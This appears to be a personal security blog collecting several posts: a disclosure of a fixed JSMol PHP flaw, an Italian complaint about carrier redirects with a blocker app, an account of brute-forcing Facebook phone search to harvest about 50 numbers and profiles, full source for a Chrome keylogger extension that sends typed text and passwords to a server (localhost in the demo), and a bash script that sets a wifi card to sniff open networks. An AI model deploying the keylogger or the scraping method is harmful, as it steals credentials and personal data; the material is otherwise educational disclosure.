JSMol plugin vulnerability and thoughts about security

JMol is a library used to create 3D models of molecules in Java, which can be embedded into webpages using the usual applets. JSMol is a Javascript library which is used to provide the Jmol capabilities through the HTML5 technologies, relying on server side computation for some functionality.

Here’s a short story about how I discovered some pretty bad vulnerabilities in the JSMol software, and how it can affect every server which is hosting this software.

 

Using my university’s moodle installation, I discovered that the JMol/JSMol plugin for moodle was installed and probably misconfigured in some way: it had unusual permissions set in its directory tree.

This made me curious and I wanted to better understand what was going on.

I made some research, and discovered the plugin along with its source code (the project is entirely open source), and started to look at the source of the only PHP file in the JSMol package.

Looking through the code, I discovered a lot of parameters used without proper sanitizing and checks, and quickly discovered two related and pretty serious vulnerabilities.

The first one is a vulnerability which allows an attacker to read the entire filesystem with the PHP process’ privileges. The second is even worse, but it seems it had been fixed in the newer releases of the software, and was about arbitrary execution of commands on the server.

They derived from an insecure use of PHP’s file_get_contents() and exec() functions in combination with badly checked parameters coming from GET and POST variables.

I immediately contacted the developer of the plugin and reported the vulnerability, along with the curator of the JMol plugin of moodle.

As of today, the vulnerability has been fixed by the developer, and should be available in the latest version of the software.

Anyway, some research I’ve made suggests that the vulnerability was present in many websites using the plugin, which I thinks are unlikely to upgrade the software. In particular I analyzed every registered moodle installation from moodle.net (roughly 50k) and discovered that a small fraction (~100) had the plugin installed and was vulnerable.

I would not classify it as a widespread vulnerability, but I think this should remind us of the nature of websites’ security. In fact, I would say that every even small piece of software publicly accessible on a website should be cause of concern when thinking about security.

As is often said, the best thing to do about software security is to firmly believe that you don’t have any.

 

Due parole e un’app sugli strani redirect sdc.tre.it sdcf.tre.it di Tre Italia

In questi giorni mi sono ritrovato a discutere con i centralinisti del servizio clienti di Tre Italia a proposito di strani redirect che mi succedevano navigando su rete 3 con il mio cellulare. In particolare, succedeva che il mio browser veniva a tutti gli effetti intercettato e rediretto ad un servizio che appartiene al dominio tre.it, el mio caso sdcf.tre.it, che redirigeva a siti pubblicitari.

Ricercando in rete l’indirizzo, ho trovato diverse persone che condividevano il mio stesso problema, così ho deciso di telefonare al servizio clienti per far chiarezza.

La prima telefonata è stata a dir poco futile, nella quale il (non troppo preparato) centralinista mi assicurava che l’indirizzo non aveva assolutamente a che fare con alcun servizio della Tre. La cosa è ovviamente e palesemente falsa, dal momento che è un indirizzo che appartiene al dominio tre.it, registrato dalla società in questione.

A questo punto ho deciso di scrivere sulla pagina facebook di assistenza clienti 3, ottenendo le prime informazioni:

screen_assistenza_tre_sdcf

 

Insistendo col servizio clienti, un’altra operatrice mi cerca di dare maggiori informazioni, ma nemmeno lei sa spiegare qualcosa a proposito di questi strani redirect. L’unica cosa che scopro è che sul mio conto sono stati addebitati 14 centesimi per visualizzazione di contenuti di “editoria mobile”, che sono riconducibili a testate giornalistiche che hanno stretto contratti con Tre Italia per addebitare automaticamente sul conto dei visitatori che accettassero di visualizzare le pagine con i loro articoli. L’operatrice mi assicura che quando queste pagine si presentano, da qualche parte deve essere specificato che il contenuto è a pagamento, e io di questo sono sicuro. Ma sono anche relativamente certo che non avrei mai accettato di pagare 7 o 9 centesimi per visualizzazione se ne fossi stato cosciente. Sento puzza di soldi facili per le testate giornalistiche e Tre.

Detto questo, chiedo che Tre non accetti mai in futuro addebiti sul mio conto che non siano relativi all’utenza telefonica, come ad esempio questi addebiti da siti quali corriere.it o repubblica.it. L’operatrice insiste che questo non è possibile, farfugliando qualcosa a proposito del fatto che Internet è libera. Devo dire che se anche Internet fosse libera, cosa di cui dubito sempre di più, Tre si sta impegnando in tutti i modi per evitare che sia così.

Finito questo piccolo sfogo, che racconta la mia esperienza con gli addebiti Tre, veniamo alla parte tecnica, che più si addice a questo blog. Ho provato a realizzare un’applicazione Android che, senza necessità dei permessi di root sul telefono, sia in grado di intercettare le chiamate ai servizi di tre.it riconducibili a pubblicità o addebiti indesiderati. Cercando in rete ho scoperto degli indirizzi sono usati da Tre per “servizi” che hanno (a mio avviso) come scopo principale quello di addebitare costi a utenti inconsci, e che si possono trovare preinseriti addirittura nei browser predefiniti dei telefoni brandizzati Tre. Tutto questo è un insulto alla clientela, se non si può già paralare di truffa.

L’applicazione che ho sviluppato serve ad intercettare eventuali redirect indesiderati del browser verso questi indirizzi:

sdc.tre.it

sdcf.tre.it

mobile.tre.it

portal.tre.it

L’applicazione è per ora in fase di test, potrebbe non funzionare bene e non in tutti gli scenari, ma è già qualcosa. L’ho già rilasciata sperando che possa funzionare almeno in parte per chi condivide questi problemi, soprattutto perchè anche cercando in rete, o chiamando il servizio clienti sembra che questi problemi non si possano risolvere altrimenti.

Ecco il link all’applicazione nel Google Play Store:

https://play.google.com/store/apps/details?id=it.nicassio.addebititreblocker

Update:

Aggiungo un link ad un relativo articolo di bastabollette.it che suggerisce anche un approccio legale al problema: https://bastabollette.it/telefonia/h3g/sdcf-tre-come-difendersi/

Facebook: searching people by phone number

Looking in the privacy settings of my Facebook profile, I discovered the option which indicates who can search you by the phone number you provided. The default setting is everyone.

Probably this option is intended for allowing users to match friends from the phonebook of their phones, but works in the desktop site too, by simply inserting the phone number in the searchbox. It works even if you have set your phone number to be private, it’s a different kind of option.

This is pretty similar to the kind of matching is made in WhatsApp or similar apps to find friends, but is completely different if you think that in those other services you cannot discover additional information like first and last name by providing the phone number, you just use the name you’re providing in your phonebook.

Using this Facebook feature lets you get a lot of information (Facebook’s public profile infos) by only providing the number of the person you’re interested in. That’s interesting.

Of course, to be searched this way, you need to have provided your number in some way to facebook. But this is more and more common, Facebook asks for it in various occasions, such as for the two step verification, and likely by using the mobile messenger app.

With that said, this service can be used to match unknown numbers, which is pretty useful [and a little creepy, if you think you can finally find out whose person number is being written in the toilette].

Interested by this possibility, I tried to brute-force the function to create an phonebook of random people from Facebook. I made a program which randomly tries a lot of numbers waiting for matches in the searchbox.

Actually, it worked pretty good, and I was able to retrieve like ~50 phone numbers and relative facebook profile by searching phone numbers similar to my own.

The program was set to run forever, but after a while Facebook noticed me that I was misusing their services, and asked me to enter a captcha to verify my humanity. 🙂

This method is probably not suitable for retrieving the phone numbers of every facebook user (actually I still think there’s a chance if you have a large number of fake Facebook accounts working simultaneously), but could be used by some spammers to find few random numbers and relative public information (likes, hometown, ecc) to perform some targeted advertising.

My very simple python script is bound to the italian version of Facebook, but is essentially very easy, uses Selenium webdrivers to login in Facebook and then search for numbers in the serachbox, looking for changes in the search suggestions to identify a match.

Since I don’t need people to get my Facebook friendship only because I’m in their phonebook, I changed the option value from everyone to friends.

A thought (and proof-of-concept) about malicious Chrome extensions

Ok, today I made a simple Chrome extension, and suddenly got very excited about it (yeah I know, almost every blog post I write starts like this). Then reading about the extensions possibilities, I learned that the extensions are not limited by the same-origin policy.

This means that, if an extension made an AJAX request, it could be directed to a server different from the domain of the current page. This can be harmful in some different ways, the first I imagine is a simple keylogger extension which logs everything you type (passwords included) and sends it to a malicious server to collect them.

And that’s what I made, just to understand how difficult it was, and which kind of warning would the Google Web Store issue when you decide to add it to your browser.

Making the malicious extension

Actually, since that you can inject javascript, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:

manifest.json:

{
  "manifest_version": 2,
"name": "KeyLogger",
"description": "This extension logs everything you type.",
"version": "1.0.1",

"permissions": [
"http://*/*", "https://*/*"
],

"content_scripts": [{
"matches": ["http://*/*", "https://*/*"],
"js": ["script.js"]
}]
}

script.js:

var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..')

setInterval( function() {

var inputs = document.getElementsByTagName('input')

var textAreas = document.getElementsByTagName('textarea')

var myLog = function(event) {
var what = encodeURIComponent(event.srcElement.value)

console.log("Logged: " + what)
console.log("Sending data to remote server..")
xmlhttp.open("GET","http://localhost/?"+what,true);
xmlhttp.send();
}

var getHandler = function(previousHandler,obj) {
return function(e) {
myLog(e);
if(previousHandler) previousHandler(e);
}
}

for(var i=0; i<inputs.length; i++) {
if(inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
inputs[i].onblur = getHandler(inputs[i].onblur,inputs[i])
}
}

for(var i=0; i<textAreas.length; i++) {
textAreas[i].onblur = getHandler(textAreas[i].onblur,textAreas[i])
}
},2000)

The script is a simple implementation that sends via AJAX requests every text you type in a textbox, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension

 

I published it to the Chrome Web Store, and tried to install it, to see what kind of warning should show up, and all I got was this:

keyloggerwarning

 

..not so uncommon for, say, an Advertising blocking extension:

adblockpermissions

 

So this blog post is here to remind you that you should use only trusted Chrome extensions. It’s very easy to steal your data with a malicious chrome extension, it’s easy to hide some malicious code in a apparently innocent extensions and after you have installed it, it’s easy to forget about it.

Please don’t do bad things with my code and/or ideas.

 

Why unencrypted wireless network are bad

A lot of times, speaking to people about home wifi and security, i hear something like this: “Why should I encrypt my home wireless network, I don’t mind sharing my internet connection, I’m ok with it as long as I don’t need my whole bandwidth”. And I can’t tell that’s wrong at all.

But what these people don’t think, which is not obvious for those who doesn’t know how it works, is the whole question of security: when you connect to a wifi network, you usually exchange data over the air with an access point, which is the only device supposed to receive and process it.

But when you send data through your wireless card, you’re just broadcasting it over the air, and every device close enough to your computer which is capable of receiving wireless data could potentially receive it.

As you could imagine, when you establish a connection through an access point, you’re sending data but you’re also receiving data from it. That means that every wireless card has the capability of receiving data of a wireless connection. Obvious.

But then, how comes that I can surf the Internet without seeing the traffic of all the other people of the network? Of course, the wireless protocol grants that only the data meant to be sent to my wireless card will be processed, ignoring all the packets sent to other’s. That’s clear and reasonable.

But what you should ask now is: who is granting that the wireless protocol is working that way?

Nice question. It’s the operating system. It speaks directly to the hardware, which is meant to receive bits correctly and not much more. The card then turns the bytes received to the operating system, which interprets them and decides what to do. Usually operating systems are built to avoid people messing up with the hardware itself, which is usually a good idea, so the protocols are deeply integrated with them. Here is when you come and say: “The hardware is mine and I want to do what I want with it”. That’s why you should use Linux. Linux is free, and so are you when you use it over your computer hardware. Linux is programmed to work as you expect it would, but it always lets you do what you want if you know how (and have the right permissions).

That means yes, you can actually receive data packets the other people are broadcasting, as long as you’re close enough with the source of the wireless signal and you have a wireless card capable of doing that (most of the cards will work, but some cards which are hardware-blocking this possibility exist).

Now that you understood that you can receive other’s data, let’s go back to the encryption problem. Of course, since you’re broadcasting data over the air, you can always be received by someone else’s wireless card. But if you’re connected to a unencrypted network, you are also sending data in clear. That means you’re broadcasting to potentially anyone everything you’re sending to the network, and they can read it in clear. The funny thing is that, when you’re only receiving data, no one can notice it since you’re not transmitting anything yourself. You don’t even need to be connected to the same network, you just have to listen on the right “channel”.

Fortunately, you’re not beaten yet in this privacy war. If you’re connected to an unencrypted wireless network but you’re using an encrypted service, such as https, you’re still transmitting data in clear, but that data is https data, which has already been encrypted by the https protocol, which you and the endpoint are using (and want to use). So when the malicious listener receives the wireless data, he can see it, but he’ll found it’s encrypted data.

You can now understand that all the unencrypted traffic sent through an unencrypted connection can be intercepted and read in clear by a potential attacker.

Some examples of unencrypted services that transmits unencrypted data are ftp, pop3, smtp, http. If you use one of these protocol over an unencrypted connection you can be easily read by someone other’s computer nearby.

I’ve created a little bash script which looks for an unencrypted wireless network and starts listening for packets sent through it. Then you can use your preferred packet sniffer software to display and analyze the packets received from your wireless card.

Here’s the code:

 

#!/bin/bash

dev=wlan0

echo "Setting $dev to managed mode"
sudo rfkill unblock wifi
sudo ifconfig $dev down; sudo iwconfig $dev mode managed
sudo ifconfig $dev up

channel=""
ssid=""
unencryptedchannel=""
sleep 2
echo "Searching for unsecured network channels"
for word in `sudo iwlist $dev scan`;
do
if [ "$word" == "Cell" ]; then
channel=""
ssid=""
fi
buf=`echo "$word" | grep "Channel:" | cut -d':' -f 2`
#echo "Buf: $buf"
if [ "$buf" != "" ]; then
echo "I've got a channel! The channel $buf"
channel="$buf"
fi

essid=`echo "$word" | grep "ESSID:" | cut -d':' -f 2`
if [ "$essid" != "" ]; then
echo "The essid is $essid"
ssid="$essid"
if [ "$unencryptedchannel" != "" ]; then
break
fi
fi

enc=`echo "$word" | grep "key:" | cut -d':' -f 2`
#echo "enc: $enc"
if [ "$enc" == "off" ]; then
echo "The channel $channel has no encryption!"
unencryptedchannel="$channel"
fi
done

if [ "$unencryptedchannel" == "" ]; then
echo "No unencrypted network. Quitting"
exit
fi

echo "Your channel is $unencryptedchannel, on wifi network $ssid. Proceeding with sniffing"
sleep 1

echo "Putting $dev in monitor mode"
sudo ifconfig $dev down; sudo iwconfig $dev mode monitor
sudo ifconfig $dev up
sleep 1
while [ "`iwconfig $dev | grep Monitor`" == "" ]; do
echo "Monitor mode not set, retrying"
sudo ifconfig $dev down; sudo iwconfig $dev mode monitor
sudo ifconfig $dev up
sleep 1
done

echo "Setting $dev to channel $unencryptedchannel"
sudo iwconfig $dev channel $unencryptedchannel
echo "Interface $dev ready for sniffing."

This code is not intended to be used for malicious purposes, this is just a proof-of-concept to understand which are the real risks of transmitting through an unencrypted network. Use this code to try and intercept your own traffic while sending emails with smtp, or retrieving them with pop3, or connecting to your ftp host. You’ll better understand what I explained in this post.

It’s even possible to intercept images you are seeing on your browser through http, yes, like Facebook photos and similar. That’s because Facebook by default avoids using https after the login due to its bandwidth cost.

I should conclude encouraging you to encrypt your wireless connection if you want to protect your privacy, or at least to be aware of the risks you can take by using it with unencrypted services.